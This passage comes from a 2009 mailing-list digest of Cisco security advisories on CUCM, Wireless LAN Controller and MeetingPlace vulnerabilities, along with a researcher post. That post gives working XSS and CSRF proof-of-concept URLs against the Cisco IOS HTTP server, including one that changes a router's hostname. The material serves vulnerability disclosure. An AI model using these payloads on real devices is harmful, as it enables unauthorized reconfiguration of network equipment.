contains a denial of service (DoS) vulnerability in the Certificate
Authority Proxy Function (CAPF) service. Exploitation of this
vulnerability could cause an interruption in voice services. The CAPF
service is disabled by default.
Cisco has released free software updates that address this
vulnerability. Workarounds available that mitigate this vulnerability
are available.
This advisory is posted at:
http://www.cisco.com/warp/public/707/cisco-sa-20090121-cucmcapf.shtml
Affected Products
=================
Vulnerable Products
+------------------
These products are vulnerable:
* Cisco Unified Communications Manager 5.x versions prior to 5.1(3e)
* Cisco Unified Communications Manager 6.x versions prior to 6.1(3)
Administrators of systems that are running Cisco Unified
Communications Manager versions 5.x and 6.x can determine the
software version by viewing the main page of the Cisco Unified
Communications Manager Administration interface. The software version
can also be determined by running the command show version active by
way of the command line interface (CLI).
Products Confirmed Not Vulnerable
+--------------------------------
Cisco Unified Communications Manager version 4.x and Cisco Unified
Communications Manager Express are not affected by this
vulnerability. No other Cisco products are currently known to be
affected by this vulnerability.
Note: Cisco Unified Communications Manager 7.0(1) shipped with the
software fix for this vulnerability and is not affected.
Details
=======
The CAPF service of Cisco Unified Communications Manager versions 5.x
and 6.x contain a vulnerability when handling malformed input that
may result in a DoS condition. The CAPF service is disabled by
default; however, if it is enabled, the CAPF service listens by
default on TCP port 3804 and the listening port is configurable by
the user. There is a workaround for this vulnerability. This
vulnerability is fixed in Cisco Unified Communications Manager
versions 5.1(3e) and 6.1(3). This vulnerability is documented in
Cisco Bug ID CSCsq32032 and has been assigned Common Vulnerabilities
and Exposures (CVE) identifier CVE-2009-0057.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
CSCsq32032 - CAPF DoS when client terminates prematurely
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerability described in this
advisory may result in the interruption of voice services.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Cisco Unified Communications Manager version 5.1(3e) contains the fix
for this vulnerability and can be downloaded here:
http://tools.cisco.com/support/downloads/go/ReleaseType.x?optPlat=null&isPlatform=Y&mdfid=280735907&sftType=Unified%20Communications%20Manager%20Updates&treeName=Voice%20and%20Unified%20Communications&modelName=Cisco%20Unified%20Communications%20Manager%20Version%205.1&mdfLevel=Software%20Version/Option&treeMdfId=278875240&modifmdfid=null&imname=null&hybrid=Y&imst=N
Cisco Unified Communications Manager version 6.1(3) contains the fix
for this vulnerability can downloaded here:
http://tools.cisco.com/support/downloads/go/PlatformList.x?sftType=Unified%20Communications%20Manager%20Updates&mdfid=281023410&treeName=Voice%20and%20Unified%20Communications&mdfLevel=Software%20Version/Option&url=null&modelName=Cisco%20Unified%20Communications%20Manager%20Version%206.1&isPlatform=N&treeMdfId=278875240&modifmdfid=null&imname=null&hybrid=Y&imst=N
Workarounds
===========
To mitigate against this vulnerability, system administrators can
disable the CAPF service if it is not necessary for business
operations. Access to the CAPF service is only required if Cisco
Unified Communications Manager systems and IP phone devices are
configured to use certificates for a secure deployment. If phones are
not configured to use certificates, then the CAPF service can be
disabled. The CAPF service is controlled by the Cisco Certificate
Authority Proxy Function menu selection.
It is possible to mitigate the CAPF vulnerability by implementing
filtering on screening devices if the CAPF service is required. If
the CAPF service is enabled, allow access to TCP port 3804 only from
networks that contain IP phone devices that require the CAPF service.
The CAPF port is user configurable, and if modified, filtering on
screening devices should be based on the TCP port that is used.
For Cisco Unified Communications Manager 5.x and 6.x systems, please
consult the following documentation for details on how to disable
Cisco Unified Communications Manager services:
http://www.cisco.com/en/US/docs/voice_ip_comm/cucm/service/5_0_1/ccmsrva/sasrvact.html#wp1048220
Additional mitigation techniques that can be deployed on Cisco
devices within the network are available in the Cisco Applied
Mitigation Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20090121-cucmcapf.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at:
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html
or as otherwise set forth at Cisco.com Downloads at:
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact
information, including localized telephone numbers, and instructions
and e-mail addresses for use in various languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
This vulnerability was reported to Cisco by VoIPshield.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20090121-cucmcapf.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2009-January-21 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at http://www.cisco.com/en/US/products/
products_security_vulnerability_policy.html. This includes
instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at http://www.cisco.com/
go/psirt.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (SunOS)
iD8DBQFJd0dD86n/Gc8U/uARAhPkAJ9eOS8yZa18csFfRpyarwx2G4G00wCgjPWa
Jd/WyK/F5INcBCYG2KCL2K0=
=MqQz
-----END PGP SIGNATURE-----
--- End Message ---
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Multiple Vulnerabilities in Cisco Wireless
LAN Controllers
Advisory ID: cisco-sa-20090204-wlc
http://www.cisco.com/warp/public/707/cisco-sa-20090204-wlc.shtml
Revision 1.0
For Public Release 2009 February 04 1600 UTC (GMT)
Summary
=======
Multiple vulnerabilities exist in the Cisco Wireless LAN Controllers
(WLCs), Cisco Catalyst 6500 Wireless Services Modules (WiSMs), and
Cisco Catalyst 3750 Integrated Wireless LAN Controllers. This security
advisory outlines details of the following vulnerabilities:
* Denial of Service Vulnerabilities (total of three)
* Privilege Escalation Vulnerability
These vulnerabilities are independent of each other.
Cisco has released free software updates that address these
vulnerabilities.
There are no workarounds available for these vulnerabilities.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20090204-wlc.shtml.
Affected Products
=================
Vulnerable Products
+------------------
The following products and software versions are affected for each
vulnerability.
Denial of Service Vulnerabilities
+--------------------------------
Two denial of service (DoS) vulnerabilities affect software versions
4.2 and later. All Cisco Wireless LAN Controller (WLC) platforms are
affected.
A third DoS vulnerability affects software versions 4.1 and later. The
following platforms are affected by this vulnerability:
* Cisco 4400 Series Wireless LAN Controllers
* Cisco 4100 Series Wireless LAN Controllers
* Cisco Catalyst 6500 Series/7600 Series Wireless Services Module
(WiSM)
* Cisco Catalyst 3750 Series Integrated Wireless LAN Controllers
Note: The Cisco Wireless LAN Controller Modules supported on Cisco
2800 and 3800 series Integrated Services Routers are not vulnerable.
The Cisco 2000 and 2100 Series Wireless LAN Controllers are also not
affected by this vulnerability.
Privilege Escalation Vulnerability
+---------------------------------
Only WLC software version 4.2.173.0 is affected by this vulnerability.
Determination of Software Versions
+---------------------------------
To determine the WLC version that is running in a given environment, use
one of the following methods:
* In the web interface, choose the Monitor tab, click Summary in
the left pane, and note the Software Version.
* From the command-line interface, type "show sysinfo" and note the
Product Version, as shown in the following example:
(Cisco Controller) >show sysinfo
Manufacturer's Name.. Cisco Systems Inc.
Product Name......... Cisco Controller
Product Version...... 5.1.151.0
RTOS Version......... Linux-2.6.10_mvl401
Bootloader Version... 4.0.207.0
Build Type........... DATA + WPS
<output suppressed>
Use the "show wism module <module number> controller 1 status" command
on a Cisco Catalyst 6500 Series/7600 Series switch if using a WiSM, and
note the Software Version, as demonstrated in the following example:
Router#show wism mod 3 controller 1 status
WiSM Controller 1 in Slot 3
Operational Status of the Controller
: Oper-Up
Service VLAN
: 192
Service Port
: 10
Service Port Mac Address
: 0011.92ff.8742
Service IP Address
: 192.168.10.1
Management IP Address
: 192.168.1.123
Software Version
: 5.1.151.0
Port Channel Number
: 288
Allowed vlan list
: 30,40
Native VLAN ID
: 40
WCP Keep Alive Missed
: 0
Products Confirmed Not Vulnerable
+--------------------------------
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
=======
Cisco Wireless LAN Controllers (WLCs), Cisco Catalyst 6500 Wireless
Services Modules (WiSMs), and Cisco Catalyst 3750 Integrated Wireless
LAN Controllers are responsible for system-wide wireless LAN functions,
such as security policies, intrusion prevention, RF management, quality
of service (QoS), and mobility.
These devices communicate with Controller-based Access Points over any
Layer 2 (Ethernet) or Layer 3 (IP) infrastructure using the Lightweight
Access Point Protocol (LWAPP).
This Security Advisory describes multiple distinct vulnerabilities in
the WLCs, WiSMs, and the Cisco Catalyst 3750 Integrated WLCs. These
vulnerabilities are independent of each other.
Denial of Service Vulnerabilities
+--------------------------------
These vulnerabilities are documented in the following Cisco Bug ID and
have been assigned the following Common Vulnerabilities and Exposures
(CVE) identifiers:
* CSCsq44516 - CVE-2009-0058
Web authentication is a Layer 3 security feature that causes the
controller to drop IP traffic (except DHCP and DNS related packets)
from a particular client until that client has correctly supplied
a valid username and password. An attacker may use a vulnerability
scanner to cause the device to stop servicing web authentication
or cause a reload of the device. The following error messages may
appear on the console during an active attack:
SshPmStMain/pm_st_main.c:1954/
ssh_pm_st_main_batch_addition_result:
Failed to add rule to the engine:
restoring old state
SshEnginePmApiPm/engine_pm_api_pm.c:1896/
ssh_pme_enable_policy_lookup:
Could not allocate message
* CSCsm82364 - CVE-2009-0059
An attacker may cause a device reload when sending a malformed post
to the web authentication "login.html" page. The following error
messages may appear on the WLC console during this attack:
Cisco Crash Handler
Signal generated during a signal 11,
count 193
Memory 0x14ef1e44 has been freed!
Note: A crash file is not generated during this attack.
* CSCso60979 - CVE-2009-0061
Affected Cisco WLC, WiSM and Catalyst 3750 Wireless LAN Controller
models are vulnerable to a DoS condition that is triggered by the
receipt of certain IP packets. Upon receiving these IP packets, the
affected device may become unresponsive and require a reboot to
recover.
Note: This vulnerability affects software versions 4.1 and later in
the Cisco 4400 series WLCs, Cisco Catalyst 6500 WiSM, and the Cisco
Catalyst 3750 Integrated Wireless LAN Controllers. Cisco 4100, 2100,
and 2000 series WLCs are not affected by this vulnerability.
Privilege Escalation Vulnerability
+---------------------------------
A privilege escalation vulnerability exists only in WLC software version
4.2.173.0, and could allow a restricted user (i.e., Lobby Admin) to gain
full administrative rights on the affected system.
Note: Wireless network users are not affected by this vulnerability.
This vulnerability is documented in Cisco Bug ID CSCsv62283 and has
been assigned the Common Vulnerabilities and Exposures (CVE) identifier
CVE-2009-0062.
Vulnerability Scoring Details
+----------------------------
Cisco has provided scores for the vulnerabilities in this advisory based
on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
this Security Advisory is done in accordance with CVSS version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of the
vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
* Certain packets may cause WebAuth services to hang or reload the
device (CSCsq44516)
CVSS Base Score - 6.1
Access Vector - Adjacent Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 5.0
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* Crash handling invalid post for webauth (CSCsq44516)
CVSS Base Score - 6.1
Access Vector - Adjacent Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 5.0
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* WLC TSEC driver may hang or crash the device (CSCso60979)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* Local Management Users may obtain full admin rights (CSCsv62283)
CVSS Base Score - 9.0
Access Vector - Network
Access Complexity - Low
Authentication - Single
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.8
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the denial of service vulnerabilities may
cause the affected device to hang or reload. Repeated exploitation
could result in a sustained DoS condition. The privilege escalation
vulnerability may allow an authenticated user to obtain full
administrative rights on the affected system.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
+-----------------------------------------------------+
| Vulnerability | Affected | First | Recommended |
| / Bug ID | Release | Fixed | Release |
| | | Version | |
|---------------+----------+------------+-------------|
| | 4.1 | Migrate to | 4.2.176.0 |
| | | 4.2 | |
| |----------+------------+-------------|
| | 4.2 | 4.2.173.0 | 4.2.176.0 |
| |----------+------------+-------------|
| | 5.0 | Migrate to | 5.2.157.0 |
| CSCsq44516 | | 5.2 | |
| |----------+------------+-------------|
| | 5.1 | Contact | Contact TAC |
| | | TAC | |
| |----------+------------+-------------|
| | 5.2 | Not | Not |
| | | vulnerable | Vulnerable |
|---------------+----------+------------+-------------|
| | 4.1 | Migrate to | 4.2.176.0 |
| | | 4.2 | |
| |----------+------------+-------------|
| | 4.2 | 4.2.112.0 | 4.2.176.0 |
| |----------+------------+-------------|
| CSCsm82364 | 5.0 | Not | Not |
| | | vulnerable | vulnerable |
| |----------+------------+-------------|
| | 5.1 | Not | Not |
| | | vulnerable | vulnerable |
| |----------+------------+-------------|
| | 5.2 | 5.2.157.0 | 5.2.157.0 |
|---------------+----------+------------+-------------|
| | 4.1 | Migrate to | 4.2.176.0 |
| | | 4.2 | |
| |----------+------------+-------------|
| | 4.2 | 4.2.117.0 | 4.2.176.0 |
| |----------+------------+-------------|
| | 5.0 | Migrate to | 5.2.157.0 |
| CSCso60979 | | 5.2 | |
| |----------+------------+-------------|
| | 5.1 | Not | Not |
| | | vulnerable | vulnerable |
| |----------+------------+-------------|
| | 5.2 | Not | Not |
| | | vulnerable | vulnerable |
|---------------+----------+------------+-------------|
| | 4.1 | Not | Not |
| | | vulnerable | vulnerable |
| |----------+------------+-------------|
| | 4.2 | 4.2.174.0 | 4.2.176.0 |
| |----------+------------+-------------|
| | 5.0 | Not | Not |
| CSCsv62283 | | Vulnerable | Vulnerable |
| |----------+------------+-------------|
| | 5.1 | Not | Not |
| | | Vulnerable | vulnerable |
| |----------+------------+-------------|
| | 5.2 | Not | Not |
| | | Vulnerable | vulnerable |
+-----------------------------------------------------+
Note: Customers running 4.1M WLC mesh code, using Cisco Wireless 1510
Access Points (APs) are recommended to migrate to release 4.2.176.0.
Customers running 4.1 mesh code, using Cisco Wireless 1520 APs are
recommended to migrate to 5.2 or later.
Workarounds
===========
There are no workarounds for any of these vulnerabilities.
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature
sets they have purchased. By installing, downloading, accessing
or otherwise using such software upgrades, customers agree to be
bound by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for software
upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained through the Software Center on Cisco's worldwide
website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through prior
or existing agreements with third-party support organizations, such
as Cisco Partners, authorized resellers, or service providers should
contact that support organization for guidance and assistance with the
appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or fix
is the most appropriate for use in the intended network before it is
deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco service
contract, and customers who purchase through third-party vendors but are
unsuccessful in obtaining fixed software through their point of sale
should acquire upgrades by contacting the Cisco Technical Assistance
Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to a
free upgrade. Free upgrades for non-contract customers must be requested
through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory. These
vulnerabilities were found during internal testing and during the
resolution of customer support cases.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY
ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that omits
the distribution URL in the following section is an uncontrolled copy,
and may lack important information or contain factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20090204-wlc.shtml
In addition to worldwide web posting, a text version of this notice is
clear-signed with the Cisco PSIRT PGP key and is posted to the following
e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on mailing
lists or newsgroups. Users concerned about this problem are encouraged
to check the above URL for any updates.
Revision History
================
+------------------------------------------------------------+
| Revision 1.0 | 2009-February-04 | Initial public release. |
+------------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security
notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt.
+--------------------------------------------------------------------
Copyright 2008 - 2009 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
Updated: Feb 04, 2009 Document ID: 108336
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEARECAAYFAkmJxSEACgkQ86n/Gc8U/uB4XQCfadDoSJbA5K+0GujUY02Rj1Ua
xnUAn0nc+bNHTzHwD298ai3ZW/JWKWaU
=waFY
-----END PGP SIGNATURE-----
--- End Message ---
--- Begin Message ---
There was a Cisco Product Security Incident Response Team (PSIRT)
advisory recently concerning some XSS/CSRF holes in the IOS..
quote{
Document ID: 98605
http://www.cisco.com/warp/public/707/cisco-sr-20090114-http.shtml
Revision 1.0
For Public Release 2009 January 14 1600 UTC (GMT)
Cisco Response:
"Two separate Cisco IOS® Hypertext Transfer Protocol (HTTP) cross-site
scripting (XSS) vulnerabilities have been reported to Cisco [...]
This response covers two separate cross-site scripting vulnerabilities
within the Cisco IOS Hypertext Transfer Protocol (HTTP) server
(including HTTP secure server - here after referred to as purely HTTP
Server) and applies to all Cisco products that run Cisco IOS Software
versions 11.0 through 12.4 with the HTTP server enabled.
};
According to this advisory these holes were patched in 12.4(15)T8 and
12.4(23).
However i found that the Cisco IOS ( 12.4(23) ) HTTP Server is still
prone to multiple cross-site scripting vulnerabilities because it fails
to sufficiently sanitize user-supplied data.
The attacker may leverage these issues to execute arbitrary script code
in the browser of an unsuspecting user in the context of the affected site.
Proof of concept:
furchtbar#sh ver | i IOS
Cisco IOS Software, C2600 Software (C2600-ADVSECURITYK9-M), Version
12.4(23), RELEASE SOFTWARE (fc1)
furchtbar#show ip http server status | include status
HTTP server status: Enabled
HTTP secure server status: Enabled
furchtbar#sh ip int br | i up
FastEthernet0/0 192.168.1.2 YES NVRAM
up up
...
[XSS]
http://192.168.1.2/level/15/exec/-/";><body onload=alert("bug")>
http://192.168.1.2/level/15/exec/-/";><iframe onload=alert("bug")>
http://192.168.1.2/exec/";><body onload="alert('bug');">
[CSRF]
http://192.168.1.2/level/15/exec/-/";><body
onload=window.location='http://192.168.1.2/level/15/configure/-/hostname/BUGGY/CR'>
http://192.168.1.2/exec/";><iframe
src="http://192.168.1.2/level/15/configure/-/hostname/BUGGY/CR";>
Best Regards,
Zloss
--- End Message ---
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Cisco Unified MeetingPlace Web Conferencing
Authentication Bypass Vulnerability
Advisory ID: cisco-sa-20090225-mtgplace
Revision 1.0
For Public Release 2009 February 25 1600 UTC (GMT)
+---------------------------------------------------------------------
Summary
=======
Cisco Unified MeetingPlace Web Conferencing servers may contain an
authentication bypass vulnerability that could allow an
unauthenticated user to gain administrative access to the
MeetingPlace application. Cisco has released free software updates
that address this vulnerability.
This advisory is posted at:
http://www.cisco.com/warp/public/707/cisco-sa-20090225-mtgplace.shtml
Affected Products
=================
Cisco Unified MeetingPlace conferencing solution provides
functionality that allows organizations to host integrated voice,
video, and web conferencing. The solution is deployed on-network,
behind the firewall and integrated directly into an organization's
private voice/data networks and enterprise applications. Cisco
Unified MeetingPlace servers can be deployed so that the server is
accessible from the Internet, allowing external parties to
participate in meetings.
Vulnerable Products
+------------------
Cisco Unified MeetingPlace Web Conferencing servers running software
versions 6.0 and 7.0 may be affected by this vulnerability.
Products Confirmed Not Vulnerable
+--------------------------------
Cisco Unified MeetingPlace Web Conferencing servers not running 6.0
or 7.0 software are not affected by this vulnerability.
Cisco Unified MeetingPlace Express is not affected by this
vulnerability.
No other Cisco products are currently known to be affected by this
vulnerability.
Details
=======
The Cisco Unified MeetingPlace Web Conferencing server may contain a
vulnerability that could allow an unauthenticated user to use a
crafted URL to bypass the authentication mechanisms of the server. If
successful, the user could gain full administrative access to the
Cisco Unified MeetingPlace application.
This vulnerability is documented in Cisco Bug ID CSCsv65815 and has
been assigned Common Vulnerability and Exposures (CVE) ID CVE-2009-0614.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
CSCsv65815 - Authentication Bypass in MeetingPlace Web Server
CVSS Base Score - 9
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Partial
Integrity Impact - Partial
Availability Impact - Complete
CVSS Temporal Score - 7.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerability may result in
unauthorized access to the administrative functions of the Cisco
Unified MeetingPlace application.
Software Versions and Fixes
===========================
This vulnerability is fixed in Cisco Unified MeetingPlace Web
Conferencing software version 6.0(517.0) also known as Maintenance
Release 4 (MR4) for the 6.0 release, and version 7.0(2) also known as
Maintenance Release 1 (MR1) for the 7.0 release.
The latest versions of Cisco MeetingPlace software can be downloaded
from:
http://tools.cisco.com/support/downloads/go/Redirect.x?mdfid=278875240
The Cisco Unified MeetingPlace Web Server software is available at:
http://tools.cisco.com/support/downloads/go/Model.x?mdfid=278816725&mdfLevel=Software%20Version/Option&treeName=Voice%20and%20Unified%20Communications&modelName=Cisco%20Unified%20MeetingPlace%20Web%20Conferencing&treeMdfId=278875240
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Workarounds
===========
There are no workarounds for this vulnerability.
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at:
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html
or as otherwise set forth at Cisco.com Downloads at:
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
